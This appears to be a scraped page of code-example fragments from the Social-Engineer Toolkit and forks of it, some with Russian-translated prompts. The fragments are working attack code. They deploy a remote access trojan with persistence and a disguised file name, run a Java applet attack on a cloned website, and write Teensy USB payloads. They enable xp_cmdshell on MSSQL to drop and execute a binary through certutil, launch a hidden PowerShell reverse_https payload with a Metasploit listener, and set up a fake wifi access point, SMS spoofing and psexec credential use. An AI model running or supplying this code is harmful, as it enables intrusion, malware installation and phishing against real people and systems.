    #         persistent='NO'
    # else:
    #         persistent='YES'

    while not valid_response:
        persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    valid_response = False

    customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #         print_info("Starting ratteserver...")
    #         ratte_listener_start(ratteport)

    while not valid_response:
        prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
コード例 #22
0
you to have a Teensy device with a soldered USB device on it and place the
file that this tool outputs in order to successfully complete the task.

It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
""")

# if we hit here we are good since msfvenom is installed
print("""
        .-. .-. . . .-. .-. .-. .-. .-.   .  . .-. .-. .-.
        |.. |-| |\| |.. `-.  |  |-  |(    |\/| | | |  )|-
        `-' ` ' ' ` `-' `-'  '  `-' ' '   '  ` `-' `-' `-'
                                                   enabled.\n""")

# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
    while True:
        core.print_warning("Filename not found, try again")
        path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
        if os.path.isfile(path):
            break

core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")

with open(path, "rb") as fileopen:
    data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
    filewrite.write(data)
コード例 #23
0
}
""")
print("[*] Payload has been extracted. Copying file to {0}".format(
    os.path.join(core.setdir + "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir + "reports")):
    os.makedirs(os.path.join(core.setdir + "reports"))
with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite:
    filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":

    # Open the IPADDR file
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
        core.update_options("IPADDR=" + ipaddr)

    if core.check_options("PORT=") != 0:
        port = core.check_options("PORT=")

    else:
        port = input("Enter the port to connect back on: ")

    with open(os.path.join(core.setdir + "/metasploit.answers",
                           "w")) as filewrite:
        filewrite.write("use multi/handler\n"
                        "set payload {0}\n"
                        "set LHOST {1}\n"
                        "set LPORT {2}\n"
                        "set AutoRunScript post/windows/manage/smart_migrate\n"
コード例 #24
0
def main():
        valid_site = False
        valid_ip = False
        valid_persistence = False
        input_counter= 0
        site_input_counter=0
        
        #pause=raw_input("This module has finished completing. Press <enter> to continue")
        
        # Get a *VALID* website address
        while valid_site != True and site_input_counter < 3:
                website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
                site = urlparse.urlparse(website)
                
                if site.scheme == "http" or site.scheme == "https":
                        if site.netloc != "":
                                valid_site = True
                        else:
                                if site_input_counter == 2:
                                        core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
                                        sleep(4)
                                        return
                                else:
                                        core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
                                        site_input_counter += 1
                else:
                        if site_input_counter == 2:
                                core.print_error("\nMaybe you have the address written down wrong?")
                                sleep(4)
                                return
                        else:
                                core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
                                site_input_counter +=1
                #core.DebugInfo("site.scheme is: %s " % site.scheme)
                #core.DebugInfo("site.netloc is: %s " % site.netloc)
                #core.DebugInfo("site.path is: %s " % site.path)
                #core.DebugInfo("site.params are: %s " % site.params)
                #core.DebugInfo("site.query is: %s " % site.query)
                #core.DebugInfo("site.fragment is: %s " % site.fragment)

        while valid_ip != True and input_counter < 3:
                ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
                valid_ip = core.validate_ip(ipaddr)
                if not valid_ip:
                        if input_counter == 2:
                                core.print_error("\nMaybe you have the address written down wrong?")
                                sleep(4)
                                return
                        else:
                                input_counter += 1
                
        #javaport must be 80, cause applet uses in web injection port 80 to download payload!
        try:
                javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
                while javaport == 0 or javaport > 65535:
                        if javaport == 0:
                                core.print_warning(text.PORT_NOT_ZERO)
                        if javaport > 65535:
                                core.print_warning(text.PORT_TOO_HIGH)
                        javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
        except ValueError:
                #core.print_info("Port set to default of 80")
                javaport = 80
        #javaport=80

        try:
                ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
                while ratteport == javaport or ratteport == 0 or ratteport > 65535:
                        if ratteport == javaport:
                                core.print_warning("Port must not be equal to javaport!")
                        if ratteport == 0:
                                core.print_warning(text.PORT_NOT_ZERO)
                        if ratteport > 65535:
                                core.print_warning(text.PORT_TOO_HIGH)
                        ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        except ValueError:
                ratteport = 8080

        persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")

# j0fer 06-27-2012 #        while valid_persistence != True: 
# j0fer 06-27-2012 #                persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 #                persistent=str.lower(persistent)
# j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 #                        persistent="NO"
# j0fer 06-27-2012 #                        valid_persistence = True
# j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 #                       persistent="YES"
# j0fer 06-27-2012 #                       valid_persistence = True
# j0fer 06-27-2012 #                else:
# j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

        customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

        #######################################
        # prepare RATTE
        #######################################

        prepare_ratte(ipaddr,ratteport,persistent,customexe)

        ######################################
        # Java Applet Attack to deploy RATTE
        #######################################

        core.print_info("Starting java applet attack...")
        java_applet_attack_tw(website,javaport, "reports/",ipaddr)

        fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
        for line in fileopen:
                ratte_random = line.rstrip()
        subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()

        #######################
        # start ratteserver 
        #######################

        core.print_info("Starting ratteserver...")
        ratte_listener_start(ratteport)
        
        ######################
        # stop webserver 
        ######################
        stop_web_server_tw()
        return
コード例 #25
0
ファイル: wifiattack.py プロジェクト: BrzTit/SET
dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.10.0 netmask 255.255.255.0 {
	range 192.168.10.100 192.168.10.254;
	option domain-name-servers 8.8.8.8;
	option routers 192.168.10.1;
	option broadcast-address 192.168.10.255;
	default-lease-time 600;
	max-lease-time 7200;
}
""")

show_fakeap_dhcp_menu = setcore.CreateMenu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = raw_input(setcore.setprompt(["8"], ""))

if fakeap_dhcp_menu_choice != "":
	fakeap_dhcp_menu_choice = setcore.check_length(fakeap_dhcp_menu_choice,2)
	# convert it to a string
	fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
	
if fakeap_dhcp_menu_choice == "":
	fakeap_dhcp_menu_choice = "1"

if fakeap_dhcp_menu_choice == "1":
	# writes the dhcp server out
	setcore.PrintStatus("Writing the dhcp configuration file to src/program_junk")
	filewrite=file("src/program_junk/dhcp.conf", "w")
	filewrite.write(dhcp_config1)
	# close the file
コード例 #26
0
ファイル: ratte_module.py プロジェクト: Cicadadenis/setoolkit
def main():
    valid_site = False
    valid_ip = False
    # valid_persistence = False
    input_counter = 0
    site_input_counter = 0
    ipaddr = None
    website = None

    # pause=input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    while not valid_site and site_input_counter < 3:
        website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse(website)

        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
                site_input_counter += 1
                # core.DebugInfo("site.scheme is: %s " % site.scheme)
                # core.DebugInfo("site.netloc is: %s " % site.netloc)
                # core.DebugInfo("site.path is: %s " % site.path)
                # core.DebugInfo("site.params are: %s " % site.params)
                # core.DebugInfo("site.query is: %s " % site.query)
                # core.DebugInfo("site.fragment is: %s " % site.fragment)

    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # javaport must be 80, cause applet uses in web injection port 80 to download payload!
    try:
        javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
    except ValueError:
        # core.print_info("Port set to default of 80")
        javaport = 80

    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Порт не должен быть равен javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")

    # j0fer 06-27-2012 #        while valid_persistence != True:
    # j0fer 06-27-2012 #                persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # j0fer 06-27-2012 #                persistent=str.lower(persistent)
    # j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
    # j0fer 06-27-2012 #                        persistent="NO"
    # j0fer 06-27-2012 #                        valid_persistence = True
    # j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
    # j0fer 06-27-2012 #                       persistent="YES"
    # j0fer 06-27-2012 #                       valid_persistence = True
    # j0fer 06-27-2012 #                else:
    # j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Запуск атаки Java-апплета..")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()
        subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.print_info("Стартовый ратсервер...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
コード例 #27
0
def main():
    valid_site = False
    valid_ip = False
    valid_persistence = False
    input_counter = 0
    site_input_counter = 0

    #pause=raw_input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    while valid_site != True and site_input_counter < 3:
        website = raw_input(
            core.setprompt(["9", "2"],
                           "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)

        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error(
                        "\nMaybe you have the address written down wrong?" +
                        core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning(
                        "I can't determine the fqdn or IP of the site. Try again?"
                    )
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                core.print_warning(
                    "I couldn't determine whether this is an http or https site. Try again?"
                )
                site_input_counter += 1
        #core.DebugInfo("site.scheme is: %s " % site.scheme)
        #core.DebugInfo("site.netloc is: %s " % site.netloc)
        #core.DebugInfo("site.path is: %s " % site.path)
        #core.DebugInfo("site.params are: %s " % site.params)
        #core.DebugInfo("site.query is: %s " % site.query)
        #core.DebugInfo("site.fragment is: %s " % site.fragment)

    while valid_ip != True and input_counter < 3:
        ipaddr = raw_input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    #javaport must be 80, cause applet uses in web injection port 80 to download payload!
    try:
        javaport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port Java applet should listen on [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Port Java applet should listen on [80]")))
    except ValueError:
        #core.print_info("Port set to default of 80")
        javaport = 80
    #javaport=80

    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                raw_input(
                    core.setprompt(
                        ["9", "2"],
                        "Port RATTE Server should listen on [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistentententent [no|yes]?")

    # j0fer 06-27-2012 #        while valid_persistence != True:
    # j0fer 06-27-2012 #                persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # j0fer 06-27-2012 #                persistent=str.lower(persistent)
    # j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
    # j0fer 06-27-2012 #                        persistent="NO"
    # j0fer 06-27-2012 #                        valid_persistence = True
    # j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
    # j0fer 06-27-2012 #                       persistent="YES"
    # j0fer 06-27-2012 #                       valid_persistence = True
    # j0fer 06-27-2012 #                else:
    # j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
    for line in fileopen:
        ratte_random = line.rstrip()
    subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
                     (definepath, definepath, ratte_random),
                     shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
コード例 #28
0
from src.core.setcore import debug_msg, mod_name

me = mod_name()
while 1:
    print """
   SMS Attack Menu

   There are diferent attacks you can launch in the context of SMS spoofing,
   select your own.

    1.  SMS Attack Single Phone Number
    2.  SMS Attack Mass SMS

    99. Return to SMS Spoofing Menu\n"""

    attack_option=raw_input(core.setprompt("0",""))

    if attack_option == 'exit':
        core.exit_set()
    # exit
    if attack_option == '1':
        print("\nSingle SMS Attack")
        to = raw_input(core.setprompt(["7"], "Send sms to"))
        phones = list()
        phones.append(to)
        sys.path.append("src/sms/client/")
        try:
            # ugly but "compliant" with SET architecture
            debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
            reload(sms_launch)
            sms_launch.phones = phones
コード例 #29
0
#   SMBUser                                       no        The username to authenticate as
#   THREADS    1                                  yes       The number of concurrent threads
#   WINPATH    WINDOWS                            yes       The name of the remote Windows directory

# msf auxiliary(psexec_command) >

# grab config options for stage encoding
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
    stage_encoding = "false"
else:
    stage_encoding = "true"

rhosts = input(
    core.setprompt(
        ["32"],
        "Enter the IP Address or range (RHOSTS) to connect to"))  # rhosts
# username for domain/workgroup
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(
    core.setprompt(
        ["32"],
        "Enter the domain name (hit enter for logon locally)"))  # domain name
threads = input(
    core.setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "":
    domain = "WORKGROUP"
# set the threads
コード例 #30
0
def deploy_hex2binary(ipaddr, port, username, password):
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
                          username,
                          password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    try:
        conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO;"
                           "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO")
    except:
        pass
    # just throw a simple command via powershell to get the output
    try:
        print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
            option_ps = input("Do you want to use powershell injection? [yes/no]:")
            if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
        print(err)
    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            attempts = 0
            while attempts <= 2:
                payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
                choice1 = "1"

        if choice1 == "1":
            web_path = None

            #prep_powershell_payload()
            import src.core.payloadgen.create_payloads 

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
                # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                                         (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
                                         (core.setdir, core.setdir), shell=True).wait()
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # we write out binary out to a file

        with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
            filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                        core.print_status("Starting the Metasploit listener...")
                        msf_path = core.meta_path()
                        child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
                                                                        os.path.join(core.setdir + "meta_config")))

        # random executable name
        random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #
    if option == "1":
        core.print_status("Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")

        #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation
        filewrite = file(core.setdir + "/payload_options.shellcode", "w")
        filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
        filewrite.close()

        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # launch powershell
        #prep_powershell_payload()

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))

        #with open(os.path.join(core.setdir + "x86.powershell")) as x86:
        x86 = file(core.setdir + "x86.powershell").read().rstrip()
        #    x86 = x86.read()

        x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
        filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
        filewrite.write(x86)
        filewrite.close()

        # if our payload is x86 based - need to prep msfconsole rc
        if payload == "x86":
            powershell_command = x86
            # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
            #with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
            filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w")
            filewrite.write("use multi/handler\n"
                                "set payload windows/meterpreter/reverse_https\n"
                                "set lport {0}\n"
                                "set LHOST 0.0.0.0\n"
                                "exploit -j".format(port))
            filewrite.close()

        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":

            try:
                core.module_reload(pexpect)
            except:
                import pexpect

            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
                                                     os.path.join(core.setdir + "reports/powershell/powershell.rc")))
            core.print_status("Waiting for the listener to start first before we continue forward...")
            core.print_status("Be patient, Metasploit takes a little bit to start...")
            #child2.expect("Starting the payload handler", timeout=30000)
            child2.expect("Processing", timeout=30000)
            core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #

    if option == "2":

        # here we start the conversion and execute the payload
        core.print_status("Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            if data == "":
                break

            core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
                                                                                                       data=data,
                                                                                                       endc=core.bcolors.ENDC))

            conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
                                                                                            exe=random_exe))
        core.print_status("Delivery complete. Converting hex back to binary format.")
        core.print_status("Dropping end header for binary format conversion...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
        core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
        conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
        core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
                          "You know. When you celebrate. Salute to you ninja - you deserve it.")
        conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
        # if we are using SET payload
        if choice1 == "1":
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                core.print_status("Spawning separate child process for listener...")
                try:
                    shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
                except:
                    pass

                # start a threaded webserver in the background
                subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
                # grab the port options

                # if core.check_options("PORT=") != 0:
                #     port = core.heck_options("PORT=")
                #
                # # if for some reason the port didnt get created we default to 443
                # else:
                #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
        thread.start_new_thread(conn.execute_query, (sql_command,))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command,))
        time.sleep(1)

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
        try:
            # interact with the child process through pexpect
            child2.interact()
            try:
                os.remove("x")
            except:
                pass
        except:
            pass
コード例 #31
0
#!/usr/bin/env python
# coding=utf-8

import subprocess
import src.core.setcore as core

#
# Simple python script to kill things created by the SET wifi attack vector
#

interface = input(core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))

# fix a bug if present
core.print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;"
                 "rfkill block all;"
                 "rfkill unblock all;"
                 "modprobe rtl8187;"
                 "rfkill unblock all;"
                 "ifconfig {0} up".format(interface),
                 shell=True).wait()

core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()

core.print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()

core.print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
コード例 #32
0
def main():
	
	#pause=raw_input("This module has finished completing. Press <enter> to continue")
	
	website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
	ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
	#javaport must be 80, cause applet uses in web injection port 80 to download payload!
	try:
		javaport = int(raw_input(core.setprompt(["9", "2"], "Port java applet should listen on (ex. 443)")))
		while javaport == 0 or javaport > 65535:
			javaport = int(raw_input(core.setprompt(["9", "2"],"Enter port java applet should listen on")))
	except ValueError:
		javaport = 80
	
	#javaport=80
	
	try:
